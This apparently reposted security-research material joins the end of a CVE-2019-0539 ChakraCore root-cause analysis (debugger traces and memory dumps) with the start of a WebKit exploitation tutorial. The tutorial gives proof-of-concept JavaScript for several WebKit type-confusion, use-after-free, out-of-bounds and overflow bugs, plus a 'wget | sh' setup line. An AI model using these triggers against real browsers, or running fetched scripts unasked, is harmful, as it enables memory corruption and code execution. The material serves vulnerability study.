C:\Windows\System32\gdi32full.dll ModLoad: 00007fff`02e10000 00007fff`02e39000 C:\Windows\System32\GDI32.dll ModLoad: 00007fff`03420000 00007fff`03575000 C:\Windows\System32\ole32.dll ModLoad: 00007ffe`ffdb0000 00007ffe`ffdd6000 C:\Windows\System32\bcrypt.dll ModLoad: 00007ffe`e7c20000 00007ffe`e7e0d000 C:\Windows\SYSTEM32\dbghelp.dll ModLoad: 00007ffe`e7bf0000 00007ffe`e7c1a000 C:\Windows\SYSTEM32\dbgcore.DLL ModLoad: 00007ffe`9bf10000 00007ffe`9dd05000 c:\pp\ChakraCore\Build\VcBuild\bin\x64_debug\chakracore.dll ModLoad: 00007fff`011c0000 00007fff`011ee000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffe`ff5b0000 00007ffe`ff5c1000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffe`f0f80000 00007ffe`f0fdc000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffe`f0f50000 00007ffe`f0f7a000 C:\Windows\SYSTEM32\bcp47mrm.dll ModLoad: 00007ffe`f0fe0000 00007ffe`f115b000 C:\Windows\SYSTEM32\windows.globalization.dll ModLoad: 00007ffe`ff010000 00007ffe`ff01c000 C:\Windows\SYSTEM32\CRYPTBASE.DLL (1e8c.20b8): Access violation - code c0000005 (first/second chance not available) First chance exceptions are reported before any exception handling. This exception may be expected and handled. Time Travel Position: 90063:0 chakracore!Js::DynamicTypeHandler::GetSlot+0x149: 00007ffe`9cd1ec79 488b04c1 mov rax,qword ptr [rcx+rax*8] ds:00010000`00001234=???????????????? 0:004> ub chakracore!Js::DynamicTypeHandler::GetSlot+0x12d [c:\pp\chakracore\lib\runtime\types\typehandler.cpp @ 96]: 00007ffe`9cd1ec5d 488b442450 mov rax,qword ptr [rsp+50h] 00007ffe`9cd1ec62 0fb74012 movzx eax,word ptr [rax+12h] 00007ffe`9cd1ec66 8b4c2460 mov ecx,dword ptr [rsp+60h] 00007ffe`9cd1ec6a 2bc8 sub ecx,eax 00007ffe`9cd1ec6c 8bc1 mov eax,ecx 00007ffe`9cd1ec6e 4898 cdqe 00007ffe`9cd1ec70 488b4c2458 mov rcx,qword ptr [rsp+58h] // object pointer 00007ffe`9cd1ec75 488b4910 mov rcx,qword ptr [rcx+10h] // slot array pointer 0:004> ba w 8 poi(@rsp+58)+10 0:004> g- Breakpoint 1 hit Time Travel Position: 9001D:178A 00000195`cc9c0159 488bc7 mov rax,rdi Below is the JIT code that ultimately overrides the pointer to the slot array. Notice the call to chakracore!Js::JavascriptOperators::OP_InitClass. As Lokihardt explained, this function will ultimately invoke SetIsPrototype which will transition the object type. 0:004> ub @rip L20 00000195`cc9c00c6 ef out dx,eax 00000195`cc9c00c7 0000 add byte ptr [rax],al 00000195`cc9c00c9 004c0f45 add byte ptr [rdi+rcx+45h],cl 00000195`cc9c00cd f249895e18 repne mov qword ptr [r14+18h],rbx 00000195`cc9c00d2 4c8bc7 mov r8,rdi 00000195`cc9c00d5 498bcf mov rcx,r15 00000195`cc9c00d8 48baf85139ca95010000 mov rdx,195CA3951F8h 00000195`cc9c00e2 48b8d040a39cfe7f0000 mov rax,offset chakracore!Js::ScriptFunction::OP_NewScFuncHomeObj (00007ffe`9ca340d0) 00000195`cc9c00ec 48ffd0 call rax 00000195`cc9c00ef 488bd8 mov rbx,rax 00000195`cc9c00f2 498bd5 mov rdx,r13 00000195`cc9c00f5 488bcb mov rcx,rbx 00000195`cc9c00f8 c60601 mov byte ptr [rsi],1 00000195`cc9c00fb 49b83058e8c995010000 mov r8,195C9E85830h 00000195`cc9c0105 48b88041679cfe7f0000 mov rax,offset chakracore!Js::JavascriptOperators::OP_InitClass (00007ffe`9c674180) // transitions the type of the object 00000195`cc9c010f 48ffd0 call rax 00000195`cc9c0112 803e01 cmp byte ptr [rsi],1 00000195`cc9c0115 0f85dc000000 jne 00000195`cc9c01f7 00000195`cc9c011b 488bc3 mov rax,rbx 00000195`cc9c011e 48c1e830 shr rax,30h 00000195`cc9c0122 0f85eb000000 jne 00000195`cc9c0213 00000195`cc9c0128 4c8b6b08 mov r13,qword ptr [rbx+8] 00000195`cc9c012c 498bc5 mov rax,r13 00000195`cc9c012f 48c1e806 shr rax,6 00000195`cc9c0133 4883e007 and rax,7 00000195`cc9c0137 48b9b866ebc995010000 mov rcx,195C9EB66B8h 00000195`cc9c0141 33d2 xor edx,edx 00000195`cc9c0143 4c3b2cc1 cmp r13,qword ptr [rcx+rax*8] 00000195`cc9c0147 0f85e2000000 jne 00000195`cc9c022f 00000195`cc9c014d 480f45da cmovne rbx,rdx 00000195`cc9c0151 488b4310 mov rax,qword ptr [rbx+10h] 00000195`cc9c0155 4d896610 mov qword ptr [r14+10h],r12 // trigger of CVE-2019-0539. Overridden slot array pointer Below is a memory dump of the object just before the OP_InitClass invocation by the JIT code. Notice how the two objects slots are inlined in the object’s memory (rather than being stored in a separated slot array). Time Travel Position: 8FE48:C95 chakracore!Js::JavascriptOperators::OP_InitClass: 00007ffe`9c674180 4c89442418 mov qword ptr [rsp+18h],r8 ss:00000086`971fd710=00000195ca395030 0:004> dps 00000195`cd274440 00000195`cd274440 00007ffe`9d6e1790 chakracore!Js::DynamicObject::`vftable' 00000195`cd274448 00000195`ca3c1d40 00000195`cd274450 00010000`00000001 // inline slot 1 00000195`cd274458 00010000`00000001 // inline slot 2 00000195`cd274460 00000195`cd274440 00000195`cd274468 00010000`00000000 00000195`cd274470 00000195`ca3b4030 00000195`cd274478 00000000`00000000 00000195`cd274480 00000195`cd073ed0 00000195`cd274488 00000000`00000000 00000195`cd274490 00000000`00000000 00000195`cd274498 00000000`00000000 00000195`cd2744a0 00000195`cd275c00 00000195`cd2744a8 00010000`00000000 00000195`cd2744b0 00000195`ca3dc100 00000195`cd2744b8 00000000`00000000 The following callstack shows that SetIsPrototype is ultimately invoked by OP_InitClass, thus transitioning the object’s type. The transition results in that the two slots will no longer be inlined, but rather stored in the slot array. This transition will later be ignored by the rest of the JIT code. 0:004> kb # RetAddr : Args to Child : Call Site 00 00007ffe`9cd0dace : 00000195`cd274440 00000195`ca3a0000 00000195`00000004 00007ffe`9bf6548b : chakracore!Js::DynamicTypeHandler::AdjustSlots+0x79f [c:\pp\chakracore\lib\runtime\types\typehandler.cpp @ 755] 01 00007ffe`9cd24181 : 00000195`cd274440 00000195`cd264f60 00000195`000000fb 00007ffe`9c200002 : chakracore!Js::DynamicObject::DeoptimizeObjectHeaderInlining+0xae [c:\pp\chakracore\lib\runtime\types\dynamicobject.cpp @ 591] 02 00007ffe`9cd2e393 : 00000195`ca3da0f0 00000195`cd274440 00000195`00000002 00007ffe`9cd35f00 : chakracore!Js::PathTypeHandlerBase::ConvertToSimpleDictionaryType<Js::SimpleDictionaryTypeHandlerBase >+0x1b1 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.cpp @ 1622] 03 00007ffe`9cd40ac2 : 00000195`ca3da0f0 00000195`cd274440 00000000`00000002 00007ffe`9bf9fe00 : chakracore!Js::PathTypeHandlerBase::TryConvertToSimpleDictionaryType<Js::SimpleDictionaryTypeHandlerBase >+0x43 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.cpp @ 1598] 04 00007ffe`9cd3cf81 : 00000195`ca3da0f0 00000195`cd274440 00000195`00000002 00007ffe`9cd0c700 : chakracore!Js::PathTypeHandlerBase::TryConvertToSimpleDictionaryType+0x32 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.h @ 297] 05 00007ffe`9cd10a9f : 00000195`ca3da0f0 00000195`cd274440 00000001`0000001c 00007ffe`9c20c563 : chakracore!Js::PathTypeHandlerBase::SetIsPrototype+0xe1 [c:\pp\chakracore\lib\runtime\types\pathtypehandler.cpp @ 2892] 06 00007ffe`9cd0b7a3 : 00000195`cd274440 00007ffe`9bfa722e 00000195`cd274440 00007ffe`9bfa70a3 : chakracore!Js::DynamicObject::SetIsPrototype+0x23f [c:\pp\chakracore\lib\runtime\types\dynamicobject.cpp @ 680] 07 00007ffe`9cd14b08 : 00000195`cd274440 00007ffe`9c20d013 00000195`cd274440 00000195`00000119 : chakracore!Js::RecyclableObject::SetIsPrototype+0x43 [c:\pp\chakracore\lib\runtime\types\recyclableobject.cpp @ 190] 08 00007ffe`9c6743ea : 00000195`cd275c00 00000195`cd274440 0000018d`00000119 00000195`c9e85830 : chakracore!Js::DynamicObject::SetPrototype+0x18 [c:\pp\chakracore\lib\runtime\types\dynamictype.cpp @ 632] 09 00000195`cc9c0112 : 00000195`cd264f60 00000195`cd273eb0 00000195`c9e85830 00007ffe`9c20c9b3 : chakracore!Js::JavascriptOperators::OP_InitClass+0x26a [c:\pp\chakracore\lib\runtime\language\javascriptoperators.cpp @ 7532] 0a 00007ffe`9cbea0d2 : 00000195`ca3966e0 00000000`10000004 00000195`ca395030 00000195`cd274440 : 0x00000195`cc9c0112 Below is a memory dump of the object after OP_InitClass invocation. Notice that the object has transitioned and that the 2 slots are no longer inlined. However, as said, the JIT code will still assume that the slots are inlined. Time Travel Position: 9001D:14FA 00000195`cc9c0112 803e01 cmp byte ptr [rsi],1 ds:0000018d`c8e72018=01 0:004> dps 00000195`cd274440 00000195`cd274440 00007ffe`9d6e1790 chakracore!Js::DynamicObject::`vftable' 00000195`cd274448 00000195`cd275d40 00000195`cd274450 00000195`cd2744c0 // slot array pointer (previously inline slot 1) 00000195`cd274458 00000000`00000000 00000195`cd274460 00000195`cd274440 00000195`cd274468 00010000`00000000 00000195`cd274470 00000195`ca3b4030 00000195`cd274478 00000195`cd277000 00000195`cd274480 00000195`cd073ed0 00000195`cd274488 00000195`cd073f60 00000195`cd274490 00000195`cd073f90 00000195`cd274498 00000000`00000000 00000195`cd2744a0 00000195`cd275c00 00000195`cd2744a8 00010000`00000000 00000195`cd2744b0 00000195`ca3dc100 00000195`cd2744b8 00000000`00000000 0:004> dps 00000195`cd2744c0 // slot array 00000195`cd2744c0 00010000`00000001 00000195`cd2744c8 00010000`00000001 00000195`cd2744d0 00000000`00000000 00000195`cd2744d8 00000000`00000000 00000195`cd2744e0 00000119`00000000 00000195`cd2744e8 00000000`00000100 00000195`cd2744f0 00000195`cd074000 00000195`cd2744f8 00000000`00000000 00000195`cd274500 000000c4`00000000 00000195`cd274508 00000000`00000102 00000195`cd274510 00000195`cd074030 00000195`cd274518 00000000`00000000 00000195`cd274520 000000fb`00000000 00000195`cd274528 00000000`00000102 00000195`cd274530 00000195`cd074060 00000195`cd274538 00000000`00000000 Below is a memory dump of the object just after the JIT code wrongly assigns the property value, overriding the slot array pointer 0:004> dqs 00000195cd274440 00000195`cd274440 00007ffe`9d6e1790 chakracore!Js::DynamicObject::`vftable' 00000195`cd274448 00000195`cd275d40 00000195`cd274450 00010000`00001234 // overridden slot array pointer (CVE-2019-0539) 00000195`cd274458 00000000`00000000 00000195`cd274460 00000195`cd274440 00000195`cd274468 00010000`00000000 00000195`cd274470 00000195`ca3b4030 00000195`cd274478 00000195`cd277000 00000195`cd274480 00000195`cd073ed0 00000195`cd274488 00000195`cd073f60 00000195`cd274490 00000195`cd073f90 00000195`cd274498 00000000`00000000 00000195`cd2744a0 00000195`cd275c00 00000195`cd2744a8 00010000`00000000 00000195`cd2744b0 00000195`ca3dc100 00000195`cd2744b8 00000000`00000000 Finally, when accessing one of the object’s properties, the overridden slot array pointer is dereferenced, resulting in a crash 0:004> g (1e8c.20b8): Access violation - code c0000005 (first/second chance not available) First chance exceptions are reported before any exception handling. chakracore!Js::DynamicTypeHandler::GetSlot+0x149: 00007ffe`9cd1ec79 488b04c1 mov rax,qword ptr [rcx+rax*8] ds:00010000`00001234=???????????????? Final Thoughts. The debugging process was simplified thanks to the TTD addition of Windbg. Specifically, the ability to set a breakpoint and then run the program in reverse leading directly to the actual slot array pointer override. This feature really shows the power of CPU tracing and execution reconstruction for software debugging and reverse engineering. Sursa: https://perception-point.io/resources/research/cve-2019-0539-root-cause-analysis/
-
Webkit Exploitation Tutorial 41 minute read Contents Preface Setup Virtual Machine Source Code Debugger and Editor Test Compiling JavaScriptCore Triggering Bugs Understanding WebKit Vulnerability 1. Use After Free 2. Out of Bound 3. Type Confusion 4. Integer Overflow 5. Else JavaScriptCore in Depth JSC Value Representation JSC Object Model 0x0 Fast JSObject 0x1 JSObject with dynamically added fields 0x2 JSArray with room for 3 array elements 0x3 Object with fast properties and array elements 0x4 Object with fast and dynamic properties and array elements 0x5 Exotic object with dynamic properties and array elements Type Inference Watchpoints Compilers 0x0. LLInt 0x1. Baseline JIT and Byte Code Template 0x2. DFG 0x3. FLT 0x4. More About Optimization Garbage Collector (TODO) Writing Exploitation Analyzing Utility Functions Getting Native Code Controlling Bytes Writing Exploit Detail about the Script Conclusion on the Exploitation Debugging WebKit Setting Breakpoints Inspecting JSC Objects Getting Native Code 1 Day Exploitation Root Cause Quotation from Lokihardt Line by Line Explanation Debugging Constructing Attack Primitive addrof fakeobj Arbitrary R/W and Shellcode Execution Acknowledgement References Preface OKay, binary security is not only heap and stack, we still have a lot to discover despite regular CTF challenge. Browser, Virtual Machine, and Kernel all play an important role in binary security. And I decide to study browser first. I choose a relatively easy one: WebKit. (ChakraCore might be easier, LoL. But there’s a rumor about Microsoft canceling the project. Thus I decided not to choose it). I will write a series of posts to record my notes in studying WebKit security. It’s also my first time learning Browser Security, my posts probably will have lots of mistakes. If you notice them, don’t be hesitate to contact me for corrections. Before reading it, you need to know: C++ grammar Assembly Language grammar Installation of Virtual Machine Familiar to Ubuntu and its command line Basic compile theory concepts Setup Okay, let’s start now. Virtual Machine First, we need to install a VM as our testing target. Here, I choose Ubuntu 18.04 LTS and Ubuntu 16.04 LTSas our target host. You can download here. If I don’t specify the version, please use 18.04 LTS as default version. Mac might be a more appropriate choice since it has XCode and Safari. Consider to MacOS’s high resource consumption and unstable update, I would rather use Ubuntu. We need a VM software. I prefer to use VMWare. Parallel Desktop and VirtualBox(Free) are also fine, it depends on your personal habit. I won’t tell you how to install Ubuntu on VMWare step by step. However, I still need to remind you to allocate as much memory and CPUs as possible because compilation consumes a huge amount of resource. An 80GB disk should be enough to store source code and compiled files. Source Code You can download WebKit source code in three ways: git, svn, and archive. The default version manager of WebKit is svn. But I choose git(too unfamiliar to use svn): git clone git://git.webkit.org/WebKit.git WebKit Debugger and Editor IDE consumes lots of resource, so I use vim to edit source code. Most debug works I have seen use lldb which I am not familiar to. Therefore, I also install gdb with gef plugin. sudo apt install vim gdb lldb wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh Test Compiling JavaScriptCore Compiling a full WebKit takes a large amount of time. We only compile JSC(JavaScript Core) currently, where most vulnerabilities come from. Now, you should in the root directory of WebKit source code. Run this to prepare dependencies: Tools/gtk/install-dependencies Even though we still not compile full WebKit now, you can install remaining dependencies first for future testing. This step is not required in compiling JSC if you don’t want to spend too much time: Tools/Scripts/update-webkitgtk-libs After that, we can compile JSC: Tools/Scripts/build-webkit --jsc-only A couple of minutes later, we can run JSC by: WebKitBuild/Release/bin/jsc Let’s do some tests: >>> 1+1 2 >>> var obj = {a:1, b:"test"} undefined >>> JSON.stringify(obj) {"a":1,"b":"test"} Triggering Bugs Ubuntu 18.04 LTS here We use CVE-2018-4416 to test, here is the PoC. Store it to poc.js at the same folder of jsc: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. return obj[k]; // Type confusion. } } opt({}); let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; let fake_object = opt(fake_object_memory); print(fake_object); First, switch to the vulnerable version: git checkout -b CVE-2018-4416 034abace7ab It may spend even more time than compiling Run: ./jsc poc.js, and we can get: ASSERTION FAILED: structureID < m_capacity ../../Source/JavaScriptCore/runtime/StructureIDTable.h(129) : JSC::Structure* JSC::StructureIDTable::get(JSC::StructureID) 1 0x7f055ef18c3c WTFReportBacktrace 2 0x7f055ef18eb4 WTFCrash 3 0x7f055ef18ec4 WTFIsDebuggerAttached 4 0x5624a900451c JSC::StructureIDTable::get(unsigned int) 5 0x7f055e86f146 bool JSC::JSObject::getPropertySlot<true>(JSC::ExecState*, JSC::PropertyName, JSC::PropertySlot&) 6 0x7f055e85cf64 7 0x7f055e846693 JSC::JSObject::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const 8 0x7f055e7476bb JSC::JSCell::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const 9 0x7f055e745ac8 JSC::JSValue::toStringSlowCase(JSC::ExecState*, bool) const 10 0x5624a900b3f1 JSC::JSValue::toString(JSC::ExecState*) const 11 0x5624a8fcc3a9 12 0x5624a8fcc70c 13 0x7f05131fe177 Illegal instruction (core dumped) If we run this on latest version(git checkout master to switch back, and delete build content rm -rf WebKitBuild/Relase/* and rm -rf WebKitBuild/Debug/*? ./jsc poc.js WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory will be disabled. OK undefined ================================================================= ==96575==ERROR: LeakSanitizer: detected memory leaks Direct leak of 96 byte(s) in 3 object(s) allocated from: #0 0x7fe1f579e458 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0458) #1 0x7fe1f2db7cc8 in __gnu_cxx::new_allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> >::allocate(unsigned long, void const*) (/home/browserbox/WebKit/WebKitBuild/Debug/lib/libJavaScriptCore.so.1+0x5876cc8) #2 0x7fe1f2db7a7a in std::allocator_traits<std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, ... // lots of error message SUMMARY: AddressSanitizer: 216 byte(s) leaked in 6 allocation(s). Now, we succeed triggering a bug! I am not gonna to explain the detail(I don’t know either). Hope we can figure out the root cause after a few weeks Understanding WebKit Vulnerability Now, it’s time to discuss something deeper. Before we start to talk about WebKit architecture, let’s find out common bugs in WebKit. Here, I only discuss binary level related bugs. Some higher level bugs, like URL Spoof or UXSS, are not our topic. Examples below are not merely from WebKit. Some are Chrome’s bugs. We will introduce briefly. And analyze PoC specifically later. Before reading this part, you are strongly recommended to read some materials about compiler theory. Basic Pwn knowledge should also be learned. My explanation is not clear. Again, correct my mistakes if you find. This post will be updated several times as my understanding in JSC becomes deeper. Don’t forget to check it later. 1. Use After Free A.k.a UAF. This is common in CTF challenge, a classical scenario: char* a = malloc(0x100); free(a); printf("%s", a); Because of some logic errors. The code will reuse freed memory. Usually, we can leak or write once we controlled the freed memory. CVE-2017-13791 is an example for WebKit UAF. Here is the PoC: <script> function jsfuzzer() { textarea1.setRangeText("foo"); textarea2.autofocus = true; textarea1.name = "foo"; form.insertBefore(textarea2, form.firstChild); form.submit(); } function eventhandler2() { for(var i=0;i<100;i++) { var e = document.createElement("input"); form.appendChild(e); } } </script> <body onload=jsfuzzer()> <form id="form" onchange="eventhandler2()"> <textarea id="textarea1">a</textarea> <object id="object"></object> <textarea id="textarea2">b</textarea> 2. Out of Bound A.k.a OOB. It’s like the overflow in Browser. Still, we can read/write nearby memory. OOB frequently occurs in false optimization of an array or insufficient check. For example(CVE-2017-2447? var ba; function s(){ ba = this; } function dummy(){ alert("just a function"); } Object.defineProperty(Array.prototype, "0", {set : s }); var f = dummy.bind({}, 1, 2, 3, 4); ba.length = 100000; f(1, 2, 3); When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn’t altered) and reads out of bounds. In most cases. we cannot directly overwrite $RIP register. Exploit writers always craft fake array to turn partial R/W to arbitrary R/W. 3. Type Confusion It’s a special vulnerability that happens in applications with the compiler. And this bug is slightly difficult to explain. Imagine we have the following object(32 bits): struct example{ int length; char *content; } Then, if we have a length == 5 with a content pointer object in the memory, it probably shows like this: 0x00: 0x00000005 -> length 0x04: 0xdeadbeef -> pointer Once we have another object: struct exploit{ int length; void (*exp)(); } We can force the compiler to parse example object as exploit object. We can turn the exp function to arbitrary address and RCE. An example for type confusion: var q; function g(){ q = g.caller; return 7; } var a = [1, 2, 3]; a.length = 4; Object.defineProperty(Array.prototype, "3", {get : g}); [4, 5, 6].concat(a); q(0x77777777, 0x77777777, 0); Cited from CVE-2017-2446 If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function. 4. Integer Overflow Integer Overflow is also common in CTF. Though Integer Overflow itself cannot lead RCE, it probably leads to OOB. It’s not difficult to understand this bug. Imagine you are running below code in 32 bits machine: mov eax, 0xffffffff add eax, 2 Because the maximum of eax is 0xffffffff. In cannot contact 0xffffffff + 2 = 0x100000001. Thus, the higher byte will be overflowed(eliminated). The final result of eax is 0x00000001. This is an example from WebKit(CVE-2017-2536? var a = new Array(0x7fffffff); var x = [13, 37, ...a, ...a]; The length is not correctly checked resulting we can overflow the length via expanding an array to the old one. Then, we can use the extensive array to OOB. 5. Else Some bugs are difficult to categorize: Race Condition Unallocated Memory … I will explain them in detail later. JavaScriptCore in Depth The Webkit primarily includes: JavaScriptCore: JavaScript executing engine. WTF: Web Template Library, replacement for C++ STL lib. It has string operations, smart pointer, and etc. The heap operation is also unique here. DumpRenderTree: Produce RenderTree WebCore: The most complicated part. It has CSS, DOM, HTML, render, and etc. Almost every part of the browser despite components mentioned above. And the JSC has: lexer parser start-up interpreter (LLInt) three javascript JIT compiler, their compile time gradually becomes longer but run faster and faster: baseline JIT, the initial JIT a low-latency optimizing JIT (DFG) a high-throughput optimizing JIT (FTL), final phase of JIT two WebAssembly execution engines: BBQ OMG Still a disclaimer, this post might be inaccurate or wrong in explaining WebKit mechanisms If you have learned basic compile theory courses, lexer and parser are as usual as what taught in classes. But the code generation part is frustrating. It has one interpreter and three compilers, WTF? JSC also has many other unconventional features, let’s have a look: JSC Value Representation To easier identifying, JSC’s value represents differently: pointer : 0000:PPPP:PPPP:PPPP (begins with 0000, then its address) double (begins with 0001 or FFFE): 0001:****:****:**** FFFE:****:****:**** integer: FFFF:0000:IIII:IIII (use IIII:IIII for storing value) false: 0x06 true: 0x07 undefined: 0x0a null: 0x02 0x0, however, is not a valid value and can lead to a crash. JSC Object Model Unlike Java, which has fix class member, JavaScript allows people to add properties any time. So, despite traditionally statically align properties, JSC has a butterfly pointer for adding dynamic properties. It’s like an additional array. Let’s explain it in several situations. Also, JSArray will always be allocated to butterfly pointer since they change dynamically. We can understand the concept easily with the following graph: 0x0 Fast JSObject The properties are initialized: var o = {f: 5, g: 6}; The butterfly pointer will be null here since we only have static properties: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | NULL | --> Butterfly Pointer -------------- | 0xffff000 | --> 5 in JS format | 000000005 | -------------- | 0xffff000 | | 000000006 | --> 6 in JS format -------------- Let’s expand our knowledge of JSObject. As we see, each structure ID has a matched structure table. Inside the table, it contains the property names and their offsets. In our previous object o, the table looks like: property name location “f” inline(0) “g” inline(1) When we want to retrieve a value(e.g. var v = o.f), following behaviors will happen: if (o->structureID == 42) v = o->inlineStorage[0] else v = slowGet(o, “f”) You might wonder why the compiler will directly retrieve the value via offset when knowing the ID is 42. This is a mechanism called inline caching, which helps us to get value faster. We won’t talk about this much, click here for more details. 0x1 JSObject with dynamically added fields var o = {f: 5, g: 6}; o.h = 7; Now, the butterfly has a slot, which is 7. -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000007 | | 000000005 | | ------------- -------------- -> | ... | | 0xffff000 | | 000000006 | -------------- 0x2 JSArray with room for 3 array elements var a = []; The butterfly initializes an array with estimated size. The first element 0 means a number of used slots. And 3 means the max slots: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0 | | ------------- (8 bits for these two elements) | | 3 | -> ------------- | <hole> | ------------- | <hole> | ------------- | <hole> | ------------- 0x3 Object with fast properties and array elements var o = {f: 5, g: 6}; o[0] = 7; We filled an element of the array, so 0(used slots) increases to 1 now: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000005 | | | 3 | -------------- -> ------------- | 0xffff000 | | 0xffff000 | | 000000006 | | 000000007 | -------------- ------------- | <hole> | ------------- | <hole> | ------------- 0x4 Object with fast and dynamic properties and array elements var o = {f: 5, g: 6}; o[0] = 7; o.h = 8; The new member will be appended before the pointer address. Arrays are placed on the right and attributes are on the left of butterfly pointer, just like the wing of a butterfly: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000008 | | 000000005 | | ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000006 | | | 2 | -------------- -> ------------- (pointer address) | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- 0x5 Exotic object with dynamic properties and array elements var o = new Date(); o[0] = 7; o.h = 8; We extend the butterfly with a built-in class, the static properties will not change: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | < C++ | | | 000000008 | | State > | -> ------------- -------------- | 1 | | < C++ | ------------- | State > | | 2 | -------------- ------------- | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- Type Inference JavaScript is a weak, dynamic type language. The compiler will do a lot of works in type inference, causing it becomes extremely complicated. Watchpoints Watchpoints can happen in the following cases: haveABadTime Structure transition InferredValue InferredType and many others… When above situations happen, it will check whether watchpoint has optimized. In WebKit, it represents like this: class Watchpoint { public: virtual void fire() = 0; }; For example, the compiler wants to optimize 42.toString() to "42" (return directly rather than use code to convert), it will check if it’s already invalidated. Then, If valid, register watchpoint and do the optimization. Compilers 0x0. LLInt At the very beginning, the interpreter will generate byte code template. Use JVM as an example, to executes .class file, which is another kind of byte code template. Byte code helps to execute easier: parser -> bytecompiler -> generatorfication -> bytecode linker -> LLInt 0x1. Baseline JIT and Byte Code Template Most basic JIT, it will generate byte code template here. For example, this is add in javascript: function foo(a, b) { return a + b; } This is bytecode IL, which is more straightforward without sophisticated lexes and more convenient to convert to asm: [ 0] enter [ 1] get_scope loc3 [ 3] mov loc4, loc3 [ 6] check_traps [ 7] add loc6, arg1, arg2 [12] ret loc6 Code segment 7 and 12 can result following DFG IL (which we talk next). we can notice that it has many type related information when operating. In line 4, the code will check if the returning type matches: GetLocal(Untyped:@1, arg1(B<Int32>/FlushedInt32), R:Stack(6), bc#7); GetLocal(Untyped:@2, arg2(C<BoolInt32>/FlushedInt32), R:Stack(7), bc#7); ArithAdd(Int32:@23, Int32:@24, CheckOverflow, Exits, bc#7); MovHint(Untyped:@25, loc6, W:SideState, ClobbersExit, bc#7, ExitInvalid); Return(Untyped:@25, W:SideState, Exits, bc#12); The AST looks like this: +----------+ | return | +----+-----+ | | +----+-----+ | add | +----------+ | | | | v v +--+---+ +-+----+ | arg1 | | arg2 | +------+ +------+ 0x2. DFG If JSC detects a function running a few times. It will go to the next phase. The first phase has already generated byte code. So, DFG parser parses byte code directly, which it’s less abstract and easier to parse. Then, DFG will optimize and generate code: DFG bytecode parser -> DFG optimizer -> DFG Backend In this step, the code runs many times; and they type is relatively constant. Type check will use OSR. Imagine we will optimize from this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff x = is_ok(ptr) ? *ptr : slow_path(ptr); y = ... // lots of stuff z = is_ok(ptr) ? *ptr : slow_path(ptr); return w + x + y + z; } to this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff if (!is_ok(ptr)) return foo_base1(ptr, w); x = *ptr; y = ... // lots of stuff z = *ptr; return w + x + y + z; } The code will run faster because ptr will only do type check once. If the type of ptr is always different, the optimized code runs slower because of frequent bailing out. Thus, only when the code runs thousands of times, the browser uses OSR to optimize it. 0x3. FLT A function, if, runs a hundred or thousands of time, the JIT will use FLT . Like DFG, FLT will reuse the byte code template, but with a deeper optimization: DFG bytecode parser -> DFG optimizer -> DFG-to-B3 lowering -> B3 Optimizer -> Instruction Selection -> Air Optimizer -> Air Backend 0x4. More About Optimization Let’s have a look on change of IR in different optimizing phases: IR Style Example Bytecode High Level Load/Store bitor dst, left, right DFG Medium Level Exotic SSA dst: BitOr(Int32:@left, Int32:@right, ...) B3 Low Level Normal SSA Int32 @dst = BitOr(@left, @right) Air Architectural CISC Or32 %src, %dest Type check is gradually eliminated. You may understand why there are so many type confusions in browser CVE now. In addition, they are more and more similar to machine code. Once the type check fails, the code will return to previous IR (e.g. a type check fails in B3 stage, the compiler will return to DFG and execute in this stage). Garbage Collector (TODO) The heap of JSC is based on GC. The objects in heap will have a counter about their references. GC will scan the heap to collect the useless memory. …still, need more materials… Writing 